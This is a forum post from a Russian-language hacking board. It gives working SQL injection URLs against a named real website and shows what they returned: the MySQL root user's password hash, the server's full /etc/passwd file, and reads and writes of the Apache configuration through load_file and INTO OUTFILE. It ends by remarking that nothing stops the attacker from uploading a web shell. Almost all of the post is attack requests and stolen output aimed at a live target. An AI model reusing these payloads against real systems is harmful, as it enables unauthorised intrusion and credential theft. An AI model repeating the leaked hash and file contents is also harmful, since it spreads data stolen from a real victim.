Показать сообщение отдельно

  #2  
Старый 31.08.2009, 21:28
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+file_priv,concat_ws(0x3a,user,passw ord),version()+from+mysql.user--
Yroot:*DB469070DB0AD0CA0B93040D166D7FC4713D6961
5.0.45

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3+from+mysql.user--
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin clamav:x:100:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin avahi-autoipd:x:101:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin dodo-online:x:500:500::/mnt/sdb1/dodo-online:/bin/bash

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user--
Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user+into+outfile+'/tmp/1.txt'--
Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/tmp/1.txt'),3+from+mysql.user--
Ну и в таком же духе, впринципе ничё не мешает залить шелл...
 
Ответить с цитированием